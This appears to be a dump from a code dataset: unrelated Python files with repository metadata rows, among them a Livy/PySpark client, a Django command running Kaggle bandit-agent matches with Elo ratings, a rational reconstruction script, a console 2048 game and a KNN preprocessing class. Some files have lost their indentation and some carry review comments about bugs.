print("alive_sess_cnt : {0}".format(self.alive_sess_cnt))
print("alive_sess_list : {0}".format(self.alive_sess_list))
def create_table_parq(self, table_name, json_data):
"""
action for create table with json request
:return:
"""
self.get_available_sess_id()
json_data = [{"name":"Andy", "univ":"snu"}]
data = {
'code': ''.join(['from pyspark.sql import SQLContext, DataFrameWriter, DataFrame, HiveContext\n',
'sqlContext = SQLContext(sc)\n',
'df_writer = sqlContext.createDataFrame(', str(json_data) ,').write\n',
'df_writer.parquet("' , str(self.hdfs_path), "/", table_name , '", mode="overwrite", partitionBy=None)'
#'df_writer.saveAsTable("' , table_name , '",format="parquet", mode="overwrite" , partitionBy=None)'
# 'df_writer = DataFrameWriter(df)\n',
# 'df_writer'
#'df.write.format("parquet").save("' ,str(self.hdfs_path), "/", table_name , '.parquet")\n'
# 'result = df_writer.saveAsTable("' ,
# table_name ,'", format="parquet", mode="overwrite"',
# ', path="' ,str(self.hdfs_path), "/", table_name, ' " ' ,
# ')\n',
# 'result'
])
}
print("request codes : {0} ".format(data))
resp = requests.post(self.host + "/sessions/" + str(min(self.avail_sess_list)) + "/statements", data=json.dumps(data), headers=self.headers)
temp_resp = json.loads(resp.content, object_hook=JsonObject)
result = livy_client.get_response(str(min(self.avail_sess_list)), temp_resp.id)
print("result : {0} ".format(result))
    def create_table_hive(self, table_name, json_data):
        """
        Create (overwrite) a Hive table from a generated PySpark/HiveContext
        snippet submitted to an idle Livy session.
        :param table_name: Hive table name passed to ``saveAsTable``.
        :param json_data: intended row payload.  NOTE(review): immediately
            overwritten with a hard-coded sample row -- the caller's data is
            ignored; confirm before production use.
        :return:
        """
        self.get_available_sess_id()
        json_data = [{"name":"Andy", "univ":"snu"}]
        data = {
            'code': ''.join(['from pyspark.sql import SQLContext, DataFrameWriter, DataFrame, HiveContext\n',
                             'hiveContext = HiveContext(sc)\n',
                             'df_writer = hiveContext.createDataFrame(', str(json_data) ,').write\n',
                             'df_writer.saveAsTable("' , table_name , '",format="parquet", mode="overwrite" , partitionBy=None)'
                             ])
        }
        print("request codes : {0} ".format(data))
        # NOTE(review): uses the module-level ``livy_client`` singleton for
        # polling instead of ``self`` (see create_table_parq).
        resp = requests.post(self.host + "/sessions/" + str(min(self.avail_sess_list)) + "/statements", data=json.dumps(data), headers=self.headers)
        temp_resp = json.loads(resp.content, object_hook=JsonObject)
        result = livy_client.get_response(str(min(self.avail_sess_list)), temp_resp.id)
        print("result : {0} ".format(result))
def get_response(self, session_id, statements_id):
"""
retry till running finished
:return:
"""
resp = requests.get(self.host + "/sessions/" + str(session_id) + "/statements/" + str(statements_id), headers=self.headers)
response_obj = json.loads(resp.content, object_hook=JsonObject)
if(response_obj.state == 'running'):
time.sleep(1)
return self.get_response(session_id, statements_id)
else:
print(resp.json())
return resp.json()
#print("response : {0}".format(self.response_obj.statements[len(self.response_obj.statements)-1].output.evalue))
def query_sql(self, query_str):
"""
get data from hive table
:return:
"""
self.get_available_sess_id()
json_data = [{"name":"Andy", "univ":"snu"}]
data = {
'code': ''.join(['from pyspark.sql import HiveContext\n',
'hiveContext = HiveContext(sc)\n',
'result = hiveContext.sql("' , str(query_str) ,'")\n'
'result'
])
}
print("request codes : {0} ".format(data))
resp = requests.post(self.host + "/sessions/" + str(min(self.avail_sess_list)) + "/statements", data=json.dumps(data), headers=self.headers)
temp_resp = json.loads(resp.content, object_hook=JsonObject)
result = livy_client.get_response(str(min(self.avail_sess_list)), temp_resp.id)
print("result : {0} ".format(result))
def query_sql_test(self):
"""
action for create table with json request
:return:
"""
self.get_available_sess_id()
data = {
'code': ''.join(['from pyspark.sql import SQLContext\n',
'sqlContext = SQLContext(sc)\n',
'df = sqlContext.read.load("/home/dev/spark/examples/src/main/resources/users.parquet")\n',
'df.registerAsTable("users")',
'result = sqlContext.sql("SELECT * FROM users").collect()',
'result'
])
}
print("request codes : {0} ".format(data))
resp = requests.post(self.host + "/sessions/" + str(min(self.avail_sess_list)) + "/statements", data=json.dumps(data), headers=self.headers)
temp_resp = json.loads(resp.content, object_hook=JsonObject)
result = livy_client.get_response(str(min(self.avail_sess_list)), temp_resp.id)
print("result : {0} ".format(result))
# Module-level smoke test: construct a manager (the argument 2 is presumably
# the desired session count -- the constructor is defined above this chunk)
# and create a sample Hive table.  The commented-out calls are alternative
# manual checks kept for convenience.
livy_client = LivyClientManager(2)
#livy_client.create_session()
#livy_client.check_alive_sessions()
#livy_client.delete_all_sessions()
#livy_client.get_available_sess_id()
#livy_client.create_table_parq("abcd", None)
livy_client.create_table_hive("abcd", None)
#livy_client.get_response(8, 102)
#livy_client.print_all()
#livy_client.query_sql("select * from abcd")
#livy_client.query_sql_test()
3374cd30315d99b0b31d5236c252d3db7a912435 | Python | nacho1415/Toy_Blockchain | /OneDrive/바탕 화면/알고리즘/1000~2000/1871.py | UTF-8 | 204 | 3.609375 | 4 | [] | no_license | sum = 0
# One test case per input line; each line looks like "XXX-YYY".
# NOTE(review): relies on the module-level ``sum = 0`` initialisation above
# (which shadows the ``sum`` builtin); ``item_b`` is read but never used, and
# the inner loop reuses the outer loop variable ``i`` (harmless here because
# the outer ``i`` is never read).
for i in range(int(input())):
    item_a, item_b = input().split("-")
    for i in range(len(item_a)):
        # Treat item_a as a base-26 number of character codes:
        # ord(c) * 26**(2 - position).  Presumably item_a always has exactly
        # 3 characters -- for longer input the exponent goes negative and the
        # total becomes a float; TODO confirm the expected input format.
        sum = sum + ord(item_a[i])*(26**(2-i))
    # NOTE(review): the total is printed twice per test case -- confirm the
    # second print is intentional and not a debugging leftover.
    print(sum)
    print(sum)
    sum = 0
| true |
4ee9acc8bbc45cb37c1210f315c00cdd08a771b2 | Python | FlyingUnicorn/.emacs.d | /scripts/getSrcHdr.py | UTF-8 | 1,744 | 2.71875 | 3 | [] | no_license | import os
import sys
lst_ext_src = ['c', 'cpp', 'cc']
lst_ext_hdr = ['h']
lst_dir_src = ['src', 'Src', 'source', 'Source', 'sources', 'Sources']
lst_dir_hdr = ['inc', 'Inc', 'include', 'Include', 'includes', 'Includes']
def assemble_path(f_base, f_dir, f_name, f_ext):
f_target = '{}/{}/{}.{}'.format(f_base, f_dir, f_name, f_ext)
#print('exist: {} target: {}'.format(os.path.isfile(f_target), f_target))
return (os.path.isfile(f_target), f_target)
def find_src_hdr(path_buffer):
try:
#print(' -- {} --'.format(path_buffer))
f_ext = path_buffer.split('.')[-1]
f_name = '.'.join(path_buffer.split('.')[:-1]).split('/')[-1]
f_split = path_buffer.split('/')
f_dir = f_split[-2]
f_base = '/'.join(f_split[:-2])
#print('base: {}'.format(f_base))
#print('ext: {}'.format(f_ext))
#print('dir: {}'.format(f_dir))
#print('name: {}'.format(f_name))
lst_dir_asso = [f_dir]
lst_ext_asso = []
# source
if f_ext in lst_ext_src:
if f_dir in lst_dir_src:
lst_dir_asso.extend(lst_dir_hdr)
lst_ext_asso = lst_ext_hdr
#header
elif f_ext in lst_ext_hdr:
if f_dir in lst_dir_hdr:
lst_dir_asso.extend(lst_dir_src)
lst_ext_asso = lst_ext_src
else:
return
for dir_asso in lst_dir_asso:
for ext in lst_ext_asso:
(found, target) = assemble_path(f_base, dir_asso, f_name, ext)
if found:
sys.stdout.write('{}'.format(target))
return
except:
pass
return
if __name__ == '__main__':
    # CLI entry point: argv[1] is the path of the file to find a counterpart for.
    find_src_hdr(sys.argv[1])
| true |
e49285ef8841d5b178ded0a2d30c457eba1c0e10 | Python | ANazaret/Santa20-Local-Contest | /app/management/commands/run_games.py | UTF-8 | 4,693 | 2.515625 | 3 | [
"Apache-2.0"
] | permissive | import numpy as np
from kaggle_environments import make
from django.utils import timezone
from django.core.management.base import BaseCommand
from app.models import Game, Agent, GameStatus, GameResult
class Command(BaseCommand):
    """Django management command: repeatedly pit two stored agents against each other."""
    def add_arguments(self, parser):
        # -n: how many games to play (default np.inf, i.e. run until killed).
        parser.add_argument(
            "-n", "--num_games", default=np.inf, type=int, dest="num_games"
        )
        # -t: free-form tag recorded on every Game row.
        # NOTE(review): the default "unkwown" looks like a typo for "unknown";
        # left unchanged because existing rows/queries may rely on it.
        parser.add_argument(
            "-t", "--trigger", default="unkwown", type=str, dest="trigger"
        )
        # -a: optional agent name that must play in every game.
        parser.add_argument("-a", "--agent", default="", type=str, dest="agent")
    def handle(self, *args, **options):
        num_games = options["num_games"]
        # Only agents that actually have an uploaded submission file can play.
        agent_id_list = list(
            Agent.objects.filter(file__isnull=False).values_list("id", flat=True)
        )
        if len(agent_id_list) < 2:
            self.stdout.write(self.style.ERROR("There must be at least 2 agents."))
            return
        c = 1
        # A single kaggle "mab" environment is reused; run_game resets it.
        env = make("mab", debug=True)
        while c <= num_games:
            left_agent_id, right_agent_id = choice_agents_for_game(
                agent_id_list, options
            )
            try:
                game = run_game(env, left_agent_id, right_agent_id, options)
            except Exception as e:
                # NOTE(review): any failure aborts the whole loop, and
                # style.ERROR receives the exception object rather than str(e).
                self.stdout.write(self.style.ERROR(e))
                return
            self.stdout.write(f"{c} - {game}")
            c += 1
def choice_agents_for_game(agent_id_list, options):
    """Pick the two agent ids for the next game.

    When ``options["agent"]`` names an agent, that agent always plays on the
    left and its opponent is drawn uniformly from the remaining ids;
    otherwise two distinct ids are drawn at random.

    :param agent_id_list: list of eligible agent primary keys (len >= 2).
    :param options: parsed command options; only the 'agent' key is read.
    :return: pair ``(left_agent_id, right_agent_id)``.
    """
    if options["agent"]:
        agent = Agent.objects.get(name=options["agent"])
        possibilities = agent_id_list.copy()
        possibilities.remove(agent.id)
        # BUGFIX: ``np.random.choice(..., size=1)`` returns a length-1 array,
        # which then leaked into ``Agent.objects.filter(id=...)`` in run_game.
        # The scalar form (no ``size``) returns a single id.
        return agent.id, np.random.choice(possibilities)
    else:
        return np.random.choice(agent_id_list, size=2, replace=False)
def run_game(env, left_agent_id, right_agent_id, options):
    """Play one game between two stored agents and persist the outcome.

    Resets *env*, runs both agents' submission files, records per-step
    actions/rewards, decides the result from the final rewards, applies the
    Elo update and saves both the Game row and the agents' new ratings.

    :param env: a kaggle-environments 'mab' environment (reused across games).
    :param left_agent_id: primary key of the left Agent.
    :param right_agent_id: primary key of the right Agent.
    :param options: parsed command options (unused here beyond 'trigger').
    :return: the saved Game instance.
    :raises ValueError: when the ids are equal or either agent is missing.
    """
    trigger = options["trigger"]
    if left_agent_id == right_agent_id:
        raise ValueError("Agents must be different")
    left_agent = Agent.objects.filter(id=left_agent_id).first()
    if not left_agent:
        raise ValueError(f"Can't find agent with id {left_agent_id}.")
    right_agent = Agent.objects.filter(id=right_agent_id).first()
    if not right_agent:
        raise ValueError(f"Can't find agent with id {right_agent_id}.")
    env.reset()
    # Create the Game row up front so the pre-game ratings are captured.
    game = Game.objects.create(
        left_agent=left_agent,
        right_agent=right_agent,
        left_current_rating=left_agent.rating,
        right_current_rating=right_agent.rating,
        configuration=env.configuration,
        trigger=trigger,
    )
    env.run([left_agent.file.path, right_agent.file.path])
    # env.steps[0] is the initial state; one (left, right) pair per step after.
    num_steps = len(env.steps) - 1
    left_actions = np.zeros(num_steps, dtype=np.uint8)
    right_actions = np.zeros(num_steps, dtype=np.uint8)
    left_rewards = np.zeros(num_steps, dtype=np.uint16)
    right_rewards = np.zeros(num_steps, dtype=np.uint16)
    for i, s in enumerate(env.steps[1:]):
        left_env, right_env = s
        left_actions[i], right_actions[i] = left_env["action"], right_env["action"]
        left_rewards[i], right_rewards[i] = left_env["reward"], right_env["reward"]
    # Rewards are presumably cumulative, so the last entry is the final score
    # -- TODO confirm against kaggle-environments' mab reward semantics.
    left_total_reward, right_total_reward = left_rewards[-1], right_rewards[-1]
    if left_total_reward > right_total_reward:
        result = GameResult.LEFT_WON
    elif left_total_reward < right_total_reward:
        result = GameResult.RIGHT_WON
    else:
        result = GameResult.DRAW
    left_new_score, right_new_score = find_new_scores(
        left_agent.rating, right_agent.rating, result
    )
    game.initial_thresholds = np.array(
        env.steps[0][0]["observation"]["thresholds"], dtype=np.uint8
    )
    game.left_actions = left_actions
    game.right_actions = right_actions
    game.left_rewards = left_rewards
    game.right_rewards = right_rewards
    game.result = result
    game.status = GameStatus.FINISHED
    game.left_new_rating = left_new_score
    game.right_new_rating = right_new_score
    game.finished = timezone.now()
    game.save()
    # Persist the updated Elo ratings on both agents.
    left_agent.rating = left_new_score
    left_agent.save(update_fields=["rating"])
    right_agent.rating = right_new_score
    right_agent.save(update_fields=["rating"])
    return game
def find_new_scores(ra, rb, result, k=32):
    """Return the post-game Elo ratings ``(new_ra, new_rb)``.

    Standard k-factor update: ``new_r = r + k * (actual - expected)``.

    :param ra: left player's current rating.
    :param rb: right player's current rating.
    :param result: a GameResult value deciding the actual scores.
    :param k: Elo k-factor (default 32).
    :raises ValueError: for an unrecognised *result*.
    """
    ea, eb = expected_scores(ra, rb)
    if result == GameResult.DRAW:
        sa = sb = 0.5
    elif result == GameResult.LEFT_WON:
        sa, sb = 1, 0
    elif result == GameResult.RIGHT_WON:
        sa, sb = 0, 1
    else:
        raise ValueError(f"Unknown result '{result}'.")
    return ra + k * (sa - ea), rb + k * (sb - eb)
def expected_scores(a, b):
    """Return the Elo expected scores ``(E_a, E_b)``; they sum to 1."""
    strength_a = 10 ** (a / 400)
    strength_b = 10 ** (b / 400)
    total = strength_a + strength_b
    return strength_a / total, strength_b / total
| true |
2b3a7d0c28d1bf7d4400b0e5558b0527a96af781 | Python | NQMTri/NumberTheory | /RationalReconstruction.py | UTF-8 | 1,950 | 3.359375 | 3 | [] | no_license | import sys
import math
from random import randrange
from utilities import *
from EffectiveThueLemma import *
def getZ(value):
    """Decompose the decimal string form of *value* into digit data.

    Returns ``(p10, z)`` where ``z`` is the list of decimal digits of
    ``str(value)`` with the decimal point removed (a single leading '0', as
    in 0.75, is also dropped), and ``p10`` is 10**(number of digits before
    the point) when the first digit is non-zero, else 1.

    NOTE(review): assumes ``str(value)`` is a plain ``digits.digits`` form;
    scientific notation (e.g. 1e-05) or a leading '-' would corrupt the
    result -- confirm callers only pass values in the plain-format range.
    """
    s = str(value)
    p10 = 1
    if s[0] != '0':
        p10 = 10
    # Multiply by 10 for every further digit before the decimal point.
    for i in range(1, len(s)):
        if s[i] == '.':
            break
        p10 *= 10
    z = []
    # Skip the leading '0' of numbers like 0.75 so z holds only significant digits.
    first = int(s[0] == '0')
    for i in range(first, len(s)):
        if s[i] != '.':
            z.append(int(s[i]))
    return (p10, z)
def Theorem4_9(n, b, R):
    """Rational reconstruction step (Shoup, Theorem 4.9).

    Runs the extended Euclidean algorithm on (n, b), maintaining Bezout
    coefficients so that ``s*n + t*b == r`` at every step, and returns the
    first triple ``(r', s', t')`` whose remainder satisfies ``r' < R``.

    :param n: modulus, n > R.
    :param b: residue with 0 <= b < n.
    :param R: the bound r* (must be < n).
    :return: tuple (r', s', t'); None only if the loop exhausts without a
             remainder below R (cannot happen for R >= 1, since the
             remainders reach 0).
    :raises ValueError: when R >= n or b is out of range.
    """
    if R >= n:
        raise ValueError("r* >= n")
    if b < 0 or b >= n:
        raise ValueError("b < 0 or b >= n")
    r, rr = n, b  # r0, r1
    s, ss = 1, 0  # s0, s1
    t, tt = 0, 1  # t0, t1
    if r < R:
        return (r, s, t)
    if rr < R:
        return (rr, ss, tt)
    while rr != 0:
        # BUGFIX: floor division.  The original used ``r/rr``, which under
        # Python 3 is true division; the float quotient corrupted both the
        # remainders and the Bezout coefficients.
        q = r // rr
        rrr = r % rr
        r, s, t, rr, ss, tt = rr, ss, tt, rrr, (s-ss*q), (t-tt*q)
        if rr < R:
            return (rr, ss, tt)
    return None
def gcd(a, b):
    """Greatest common divisor via the iterative Euclidean algorithm."""
    while b != 0:
        a, b = b, a % b
    return a
def RationalReconstruction(value, M = int(1e9)):
    """Recover a rational p/q approximately equal to *value*.

    Treats the printed decimal expansion of ``value`` as a residue b modulo
    n = 10**k and applies rational reconstruction (Theorem 4.9) with bound M.

    :param value: float to reconstruct.
    :param M: numerator/denominator bound, shrunk until 10**k > 2*M**2.
    :return: tuple (p, q) with value ~= p/q.
    NOTE(review): ``M /= 10`` and the final ``ss /= g`` / ``tt /= g`` are
    true divisions, so M and the returned pair become floats under Python 3
    -- confirm whether integer division was intended.
    """
    # check if value is already an integer
    if value.is_integer():
        return (value, 1)
    # get additional 10^x and z array
    p10, z = getZ(value)
    print(z)
    k = len(z)
    # 1. Compute n = 10^k and b = sum(z(i-1) * 10^(k-i)) with i = 1..k
    n = pow(10, k)
    b = 0
    for i in range(1, k+1):
        b += z[i-1] * pow(10, k-i)
    # make sure 10^k > 2(M^2)
    while M >= 10 and 2*(M**2) >= n:
        M /= 10
    # 2. Run the extended Euclidean algorithm on input n, b to obtain EEA(n, b)
    # and then apply Theorem 4.9 with n, b, and r* = t* = M to obtain the values r', s', t'.
    # (EEA comes from the star import of EffectiveThueLemma; its result is
    # printed for inspection only -- Theorem4_9 recomputes what it needs.)
    EEA(n, b)
    print(n, b, M)
    rr, ss, tt = Theorem4_9(n, b, M)
    # 3. Output the rational number -s'/t'
    if tt < 0:
        ss, tt = -ss, -tt
    # Undo the decimal-point shift and reduce the fraction to lowest terms.
    ss *= p10
    g = gcd(abs(ss), abs(tt))
    ss /= g
    tt /= g
    return (-ss, tt)
def main():
    """CLI: ``python RationalReconstruction.py <value> [M]``."""
    if (len(sys.argv) < 2):
        return
    value = float(sys.argv[1])
    M = int(1e9)
    if len(sys.argv) > 2:
        M = int(sys.argv[2])
    p, q = RationalReconstruction(value, M)
    # The 'l' length modifiers below are accepted (and ignored) by Python's
    # %-formatting, so %ld behaves like %d and %.20lf like %.20f.
    print("p = %ld" %(p))
    print("q = %ld" %(q))
    print("p/q = %.20lf" %(1.0*p/q))
    print("val = %.20lf" %(value))
main()
4a4e41b2c0f58302319c1b02333c01aacd4fe59f | Python | littleyellowfishes/2018-python | /2048.py | UTF-8 | 6,901 | 3.109375 | 3 | [] | no_license | import random
import sys
from numpy import *
# Module-level game state, shared by the functions below.
# r and c double as loop indices inside operation(); after a move they hold
# the coordinates of the last cell visited, which game() uses for its win check.
c = 0
r = 0
# The 4x4 board; 0 means an empty cell.
m = [[0, 0, 0, 0],
     [0, 0, 0, 0],
     [0, 0, 0, 0],
     [0, 0, 0, 0]]
# Best score seen across games in this process.
highscore = 0
def g():
    """Prompt for the game base ``y`` (tile seed / merge factor), storing it globally.

    Re-prompts until the value is inside the advertised range 2..10.
    BUGFIX: the original loop only rejected values <= 1 even though the error
    message promises an upper bound of 10, so arbitrarily large bases were
    accepted.
    """
    global y
    y = int(input("number:"))
    while y <= 1 or y > 10:
        print("Invaild input, you can only input between 2 and 10")
        y = int(input("number:"))
def exit():
    # Thin wrapper so the UI code can call exit() to quit the process.
    # NOTE(review): shadows the ``exit`` builtin within this module.
    sys.exit()
def display(m, score, highscore):  # display the interface and score
    """
    Print the 4x4 board followed by the running and best scores.
    :param m: the game matrix
    :param score: the current game's accumulated score
    :param highscore: best score seen so far in this process
    """
    print('{0:4} {1:4} {2:4} {3:4}'.format(m[0][0], m[0][1], m[0][2], m[0][3]))
    print('{0:4} {1:4} {2:4} {3:4}'.format(m[1][0], m[1][1], m[1][2], m[1][3]))
    print('{0:4} {1:4} {2:4} {3:4}'.format(m[2][0], m[2][1], m[2][2], m[2][3]))
    print('{0:4} {1:4} {2:4} {3:4}'.format(m[3][0], m[3][1], m[3][2], m[3][3]))
    print("Total score: ", score)
    print("high score:", highscore)
def init(m):  # initial the matrix
    """
    Ask for the base via g() and fill the board with a random start position.
    :param m: the initial game matrix (mutated in place)
    """
    g()
    # Each cell independently becomes 0 (p=1/2), y (p=3/8) or y**2 (p=1/8) --
    # the "2 and 4, with 4 rarer" of classic 2048 generalised to base y.
    for r in range(4):
        m[r] = [random.choice([0, 0, 0, 0, y, y, y, y**2])for x in m[r]]
def align(matrix, direction):
    """Compact a row/column in place: slide non-zero tiles toward *direction*.

    :param matrix: list of 4 tile values; mutated in place.
    :param direction: 'left' pads zeros on the right, 'right' pads on the
        left.  Any other value leaves the zeros stripped but unpadded
        (matching the original behaviour; callers only pass the two
        supported values).
    """
    # Single pass over the list instead of the original count() followed by
    # repeated remove(0) calls, which rescanned the list for every zero.
    tiles = [v for v in matrix if v != 0]
    zeros = [0] * (4 - len(tiles))
    if direction == 'left':
        matrix[:] = tiles + zeros
    elif direction == 'right':
        matrix[:] = zeros + tiles
    else:
        matrix[:] = tiles
def merge(matrix, direction):  # when the user move, if the number are the same,
    """
    Merge adjacent equal tiles in a row/column, in place.
    One scan from the *direction* side: every adjacent equal pair met during
    the scan is merged (the kept cell is multiplied by y, the other zeroed;
    merged gaps are NOT re-compacted here).  Note that for a recognised
    direction the returned ``move`` is True even when nothing merged,
    because the return sits outside the scan loop.
    :param matrix: the row/column list that will be merged
    :param direction: 'left' or 'right'
    :return: dict {'move': bool, 'score': points gained by the merges}
    """
    score = 0  # merge them and return the added score, false otherwise
    if direction == 'left':
        for r in [0, 1, 2]:
            if matrix[r] == matrix[r + 1] != 0:  # these two number can be merge
                matrix[r] *= y  # merged tile value is multiplied by the base y
                matrix[r + 1] = 0  # the absorbed cell becomes empty
                score += matrix[r]  # score plus the new number
        return {'move': True, 'score': score}
    if direction == 'right':
        for r in [3, 2, 1]:
            if matrix[r - 1] == matrix[r] != 0:
                matrix[r] *= y
                matrix[r - 1] = 0
                score += matrix[r]
        return {'move': True, 'score': score}
    return{'move': False, 'score': score}
def handle(matrix, direction):  # handle one row/column, get the value of the row/column and return the score
    """
    Compact then merge one row/column and return the points gained.
    The merge outcome is also published in the module-level ``result``
    (nothing in this chunk reads it afterwards).  The row is not
    re-compacted after merging, so a merge can leave a gap, e.g.
    [2, 2, 4, 0] -> align -> [2, 2, 4, 0] -> merge -> [4, 0, 4, 0].
    :param matrix: the row/column list that will be manipulated (in place)
    :param direction: 'left' or 'right'
    :return: total score gained on this row/column
    """
    global result
    totalscore = 0
    align(matrix, direction)
    result = merge(matrix, direction)
    totalscore += result['score']
    return totalscore
def operation(matrix):  # After user move, recompute the matrix value and return the score
    """
    Read one command from stdin, apply it to the board and spawn a new tile.
    'a'/'d' slide left/right; 'w'/'s' are implemented by transposing the
    board, sliding left/right, then transposing back; 'Exit' quits and
    'Restart' starts a fresh game.
    :param matrix: the game matrix (the module-level board ``m``)
    :return: dict {'gameOver': bool, 'score': points gained by this move}
    """
    global r, c, m
    totalscore = 0  # left and up both use 'left', down and right both use 'right'
    gameOver = False
    direction = 'left'
    o = input('operator:')
    if o in ['a', 'A']:  # left
        direction = 'left'
        for r in range(4):
            totalscore += handle(matrix[r], direction)
    elif o in ['d', 'D']:  # right
        direction = 'right'
        for r in range(4):
            totalscore += handle(matrix[r], direction)
    elif o in ['w', 'W']:  # up
        # BUGFIX: the file only does ``from numpy import *`` (plus ``import
        # random`` / ``import sys``), so the name ``numpy`` itself was never
        # bound and ``numpy.transpose`` raised NameError on the first 'w'/'s'
        # move.  ``transpose`` is exported by the star import.
        matrix = transpose(matrix)  # transpose the matrix and then left will equal to up
        matrix = [matrix[0].tolist(), matrix[1].tolist(), matrix[2].tolist(), matrix[3].tolist()]
        direction = 'left'
        for r in range(4):
            totalscore += handle(matrix[r], direction)
        matrix = transpose(matrix)  # transpose back to the original orientation
        matrix = [matrix[0].tolist(), matrix[1].tolist(), matrix[2].tolist(), matrix[3].tolist()]
        m = matrix
    elif o in ['s', 'S']:  # down
        matrix = transpose(matrix)  # transpose the matrix and then right will equal to down
        matrix = [matrix[0].tolist(), matrix[1].tolist(), matrix[2].tolist(), matrix[3].tolist()]
        direction = 'right'
        for r in range(4):
            totalscore += handle(matrix[r], direction)
        matrix = transpose(matrix)  # transpose back to the original orientation
        matrix = [matrix[0].tolist(), matrix[1].tolist(), matrix[2].tolist(), matrix[3].tolist()]
        m = matrix
    elif o in ['Exit']:
        exit()
    elif o in ['Restart']:
        print('The game has been restarted')
        game()
    else:
        print(' Invalid input, please enter character in [A, S, W, D, Exit, Restart] or the lower case')
        return{'gameOver': gameOver, 'score': totalscore}
    b = 0  # blank space
    for p in matrix:
        b += p.count(0)
    # Game-over test: board full and the last-visited cell (globals r, c from
    # the loops above) has no equal neighbour -- only that one cell is checked.
    if b == 0 and (matrix[r][c - 1] != matrix[r][c] or matrix[r - 1][c] != matrix[r][c]):
        # neither blank spaces nor two same numbers, game over
        gameOver = True
        return{'gameOver': gameOver, 'score': totalscore}
    # Spawn a new tile (y, or more rarely y**2) in the k-th empty cell,
    # with k drawn uniformly from the b empty cells.
    newnum = random.choice([y, y, y, y**2])  # still 4 will be rare
    k = random.randrange(1, b + 1)
    u = 0
    for r in range(4):
        for c in range(4):
            if matrix[r][c] == 0:
                u += 1
                if u == k:
                    m[r][c] = newnum
                    break
    return{'gameOver': gameOver, 'score': totalscore}
def comparehighscore(totalscore, highscore):
    """Return the larger of the current run's score and the stored best."""
    return totalscore if totalscore > highscore else highscore
def game():
    """Top-level game loop: initialise the board, then read moves forever.

    On game-over or win the function recurses into a fresh game().
    NOTE(review): each finished game therefore leaves a stack frame behind;
    a long enough session could hit the recursion limit.
    """
    global highscore
    init(m)
    score = 0
    print('Input character A(left) S(down) W(up) D(right) Exit Restart')
    while True:
        highscore = comparehighscore(score, highscore)
        display(m, score, highscore)
        result = operation(m)
        # print('result equals: ')
        # print(result)
        score += result['score']
        # print(f'Your maximum value is: {y**11}')
        # The win check inspects only the last cell visited by operation()'s
        # loops (globals r, c), firing once that cell reaches y**11.
        if result['gameOver']:
            print('Game Over, try next time!')
            print('Your total score:', score)
            game()
        elif m[r][c] >= y**11:
            print('Game over, you win!')
            print('Your total score:', score)
            game()
8c84de171e957ddde3d67235e4de0e0e47e9eb5b | Python | MayukhSobo/ML | /KNN/preprocess.py | UTF-8 | 6,384 | 3.28125 | 3 | [
"MIT"
] | permissive | from abc import ABC, abstractmethod
from math import ceil
from warnings import warn
import numpy as np
import pandas as pd # For all data processing
class Gather(ABC):
    """
    Gather module collects all the
    data passed through its constructor
    and performs the following operations.
    1. Head (n = 5)
    2. Tail (n = 5)
    3. Size (Rows and Columns)
    4. Shuffle the dataset (n_rounds times)
    5. Split the dataset in 2 parts (train, cross-validation)
    6. Train
    7. Cross-Validation
    8. feature & label splitting
    """
    # Class-level flag: flipped to True once *any* instance has shuffled;
    # consulted only to warn when splitting unshuffled data.
    SHUFFLED = False

    def __init__(self, path, colnames=None, typ='csv'):
        """
        Load the dataset.

        :param path: location of the input file.
        :param colnames: optional explicit column names; when given, the
                         file is read without a header row.
        :param typ: input format; only 'csv' is handled -- any other value
                    leaves ``self._data`` unset.
        """
        if typ == 'csv':
            # If the data is in csv
            if not colnames:
                self._data = pd.read_csv(path)
            else:
                self._data = pd.read_csv(path, names=colnames, header=None)
        self._cv = None
        self._train = None
        self.class_labels = None

    @property
    def head(self):
        """
        Returns the first 5 rows of the internal dataframe
        """
        return self._data.head(5)

    @property
    def tail(self):
        """
        Returns the last 5 rows of the internal dataframe
        """
        return self._data.tail(5)

    @property
    def size(self):
        """
        Returns a human-readable row/column summary of the dataframe
        """
        ret = "Rows/Entries: {}\nColumns/Variables: {}".format(
            self._data.shape[0], self._data.shape[1])
        return ret

    @property
    def train(self):
        """
        Return the train dataset
        """
        return self._train

    @property
    def test(self):
        """
        Return the cross-validation dataset
        """
        return self._cv

    def _shuffle(self, n_rounds=10, copy=False):
        """
        Shuffle the dataset and if
        copy = False stores back the result
        into the dataframe or else returns a
        new dataframe
        :param n_rounds: Number of times dataset is shuffled
        :param copy: Bool, if new dataset is created
        :return: pd.DataFrame or None
        """
        nrows = self._data.shape[0]
        index = np.arange(nrows)
        for _ in range(n_rounds):
            np.random.shuffle(index)
        if copy:
            Gather.SHUFFLED = True
            return self._data.iloc[index, :].reset_index(drop=True)
        else:
            Gather.SHUFFLED = True
            self._data = self._data.iloc[index, :].reset_index(drop=True)
            return

    def _split(self, split_ratio=0.4, dataset=None):
        """
        Split the data into a training part and a cross-validation part,
        storing them on ``self._train`` / ``self._cv``.

        :param split_ratio: fraction of rows assigned to the CV set.
        :param dataset: optional DataFrame to split; defaults to self._data.
        """
        if not isinstance(dataset, pd.core.frame.DataFrame):
            dataSet = self._data
        else:
            dataSet = dataset
        if not Gather.SHUFFLED:
            error_msg = 'Splitting the dataset without shuffling!!'
            warn(error_msg, RuntimeWarning, stacklevel=2)
        split_index = ceil(dataSet.shape[0] * (1 - split_ratio))
        self._train = dataSet.iloc[0: split_index, :].reset_index(drop=True)
        self._cv = dataSet.iloc[split_index:, :].reset_index(drop=True)

    def train_test_split(self, label, n_rounds=10, copy=False, split_ratio=0.4, reject_cols=None, numpy_array=True):
        """
        Shuffle the data for ```n_rounds``` amount of times, split the
        dataset into train and test and then return feature and labels for
        both train and test.

        :param label: name of the label column.
        :param n_rounds: number of shuffle passes.
        :param copy: shuffle a copy instead of the stored dataframe.
        :param split_ratio: fraction of rows used for the test/CV part.
        :param reject_cols: optional set of feature columns to exclude.
        :param numpy_array: return numpy arrays instead of pandas objects.
        :return: X_train, X_test, y_train, y_test
        """
        all_features = set(self._data.columns.values)
        # BUGFIX: ``set.add`` returns None, so the original
        # ``final_reject_list = reject_cols.add(label)`` crashed on the set
        # difference below whenever a reject set was actually supplied.
        # Using a union also avoids mutating the caller's set.
        if isinstance(reject_cols, set):
            final_reject_list = reject_cols | {label}
        else:
            final_reject_list = {label}
        feature_cols = list(all_features - final_reject_list)
        label_col = label
        # Split and Shuffle the dataset
        if not copy:
            # Use the same dataset
            self._shuffle(n_rounds, copy)
            self._split(split_ratio)
        else:
            # Create a new dataset
            shuffled_data = self._shuffle(n_rounds, copy)
            self._split(split_ratio, shuffled_data)
        X_train = self.train.loc[:, feature_cols]
        X_test = self.test.loc[:, feature_cols]
